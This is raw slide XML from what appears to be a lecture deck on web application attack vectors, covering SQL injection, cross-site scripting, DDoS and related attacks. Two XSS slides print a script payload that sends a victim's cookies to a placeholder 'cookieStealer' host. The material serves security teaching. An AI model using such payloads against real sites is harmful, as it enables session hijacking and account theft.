            <a:off x="9488098" y="5444265"/>
            <a:ext cx="2704706" cy="235172"/>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8" name="TextBox 47"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9712619" y="552766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Custom </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Error page</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="49" name="spedometer 1" descr="Dial_1.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6" cstate="print"/>
          <a:srcRect b="25881"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5941766" y="4016189"/>
            <a:ext cx="2527053" cy="1611880"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="50" name="spedometer 2" descr="Dial_2.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7" cstate="print"/>
          <a:srcRect b="25594"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5941766" y="4016188"/>
            <a:ext cx="2527053" cy="1618130"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="52" name="spedometer 3" descr="Dial_3.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8" cstate="print"/>
          <a:srcRect b="25903"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5941766" y="4016189"/>
            <a:ext cx="2527053" cy="1611406"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="54" name="spedometer 4" descr="Dial_4.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId9" cstate="print"/>
          <a:srcRect b="25903"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5941766" y="4016189"/>
            <a:ext cx="2527053" cy="1611406"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="46" name="spedometer 5" descr="Dial_5.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId10" cstate="print"/>
          <a:srcRect b="25594"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5941766" y="4016188"/>
            <a:ext cx="2527053" cy="1618130"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="372334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1"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right)">
                                      <p:cBhvr>
                                        <p:cTn id="29" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="30"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="30" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="31" presetID="22" presetClass="entr" presetSubtype="2" fill="hold" grpId="1"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1000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="35" presetID="22" presetClass="entr" presetSubtype="8" fill="hold" grpId="1"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1500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="42" presetID="22" presetClass="entr" presetSubtype="2" fill="hold" grpId="2"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2000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="46" presetID="22" presetClass="entr" presetSubtype="2" fill="hold" grpId="2"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par>
                          <p:cTn id="49" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="2500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="50" presetID="22" presetClass="entr" presetSubtype="8" fill="hold" grpId="2"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3000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="57" presetID="22" presetClass="entr" presetSubtype="2" fill="hold" grpId="3"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3500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="61" presetID="22" presetClass="entr" presetSubtype="2" fill="hold" grpId="3"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par>
                          <p:cTn id="67" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="4000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="68" presetID="22" presetClass="entr" presetSubtype="2" fill="hold" grpId="4"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par>
                          <p:cTn id="71" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="4500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="72" presetID="22" presetClass="entr" presetSubtype="2" fill="hold" grpId="4"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par>
                          <p:cTn id="78" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="5000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="79" presetID="22" presetClass="entr" presetSubtype="2" fill="hold" grpId="5"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par>
                          <p:cTn id="82" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="5500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="83" presetID="22" presetClass="entr" presetSubtype="2" fill="hold" grpId="5"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6000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="90" presetID="1" presetClass="exit" presetSubtype="0" fill="hold" grpId="1" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="91" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="35"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="hidden"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="92" presetID="1" presetClass="exit" presetSubtype="0" fill="hold" grpId="6"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3"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="hidden"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="98" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="6000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="99" presetID="22" presetClass="entr" presetSubtype="2" fill="hold" grpId="6"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right)">
                                      <p:cBhvr>
                                        <p:cTn id="101" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="30"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="102" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="6500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="103" presetID="10"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childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="106" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="7500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="107" presetID="22" presetClass="entr" presetSubtype="8"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left)">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0" grpId="5" animBg="1"/>
      <p:bldP spid="30" grpId="6" animBg="1"/>
      <p:bldP spid="32" grpId="0"/>
      <p:bldP spid="34" grpId="0" animBg="1"/>
      <p:bldP spid="34" grpId="1" animBg="1"/>
      <p:bldP spid="34" grpId="2" animBg="1"/>
      <p:bldP spid="34" grpId="3" animBg="1"/>
      <p:bldP spid="34" grpId="4" animBg="1"/>
      <p:bldP spid="34" grpId="5" animBg="1"/>
      <p:bldP spid="34" grpId="6" animBg="1"/>
      <p:bldP spid="35" grpId="0"/>
      <p:bldP spid="35" grpId="1"/>
      <p:bldP spid="40" grpId="0" animBg="1"/>
      <p:bldP spid="40" grpId="1" animBg="1"/>
      <p:bldP spid="40" grpId="2" animBg="1"/>
      <p:bldP spid="40" grpId="3" animBg="1"/>
      <p:bldP spid="43" grpId="0"/>
      <p:bldP spid="43" grpId="1"/>
      <p:bldP spid="42" grpId="0"/>
      <p:bldP spid="47"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Web Application Attack Vectors</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EC3D73BD-7000-441C-A2FE-CF56D0D14CF9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect l="49045" t="22868" r="15625" b="25452"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="568786" y="1432560"/>
            <a:ext cx="7470314" cy="5873466"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3238188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9135" y="415821"/>
            <a:ext cx="10114725" cy="7153380"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="162722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Attacks “Scrubbed” by Akamai</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="704850" y="1785771"/>
            <a:ext cx="8287846" cy="4401205"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0" anchor="ctr" anchorCtr="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>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SQL injection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Cross-site scripting (XSS)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File inclusion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Cache busting attacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="338335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Query Language (SQL)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2" descr="http://support.sas.com/documentation/cdl/en/sqlproc/63043/HTML/default/images/proc-sql-ex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6902"/>
            <a:ext cx="5815388" cy="2853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9" y="4265713"/>
            <a:ext cx="13601701" cy="2492990"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="ctr" anchorCtr="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Example Query:</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’PARKER’;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>IdNum</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FName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JobCode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>     Salary     Phone</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>1354     PARKER      MARY     FA3         65800      914/455-2337</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6654800" y="2442805"/>
            <a:ext cx="5677541" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="ctr" anchorCtr="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(image from http://support.sas.com)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="37459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SQL Injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533395" y="1446018"/>
            <a:ext cx="12611101" cy="6494085"/>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Suppose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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>is a variable holding a value provided by an end-user through a form on a Web page, and the application server performs the query:</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 +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 ”’;”</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Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>But what if instead of entering a name like PARKER the user enters</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Then the query becomes</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cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>This query returns all rows in the Employees table!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12642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Distributed Denial of Service (DDOS) Attacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>The attacker hopes to overwhelm the content provider’s resources with requests for service.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Sometimes the attacker issues requests through a “bot army” of compromised or rented machines.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>The attacker looks for “amplification” where an easy-to-generate request requires a large or difficult-to-generate response.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="138111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bobby-tables.com: A guide to preventing SQL injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2050" name="Picture 2" descr="xkcd Bobby Table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4" y="1825625"/>
            <a:ext cx="12388169" cy="381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4225" y="6515100"/>
            <a:ext cx="4095993"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(from the comic strip </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>xkcd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">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295927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 (XSS)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attacker types this into text entry form:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>document.location</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>='http://cookieStealer/cgi-bin/cookie.cgi?'+document.cookie&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attacker hopes that the site will insert this into HTML that it later outputs, and then the victim’s browser will execute the script.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="295490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Basic Cookie Stealing </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="731520" y="1645921"/>
            <a:ext cx="13167360" cy="1701515"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>document.location</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>='http://cookieStealer/cgi-bin/cookie.cgi?'+document.cookie&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="137161" y="2991835"/>
            <a:ext cx="14493240" cy="4435322"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="271626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731520" y="2087880"/>
            <a:ext cx="13167360" cy="3665220"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>form</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> method="get"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>select</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> name="COLOR"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>option</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> value="red"&gt;red&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>option</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>option</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> value="blue"&gt;blue&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>option</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  &lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>select</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&gt; &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>input</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> type="submit"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>form</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="850900" y="699770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750" b="87205"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
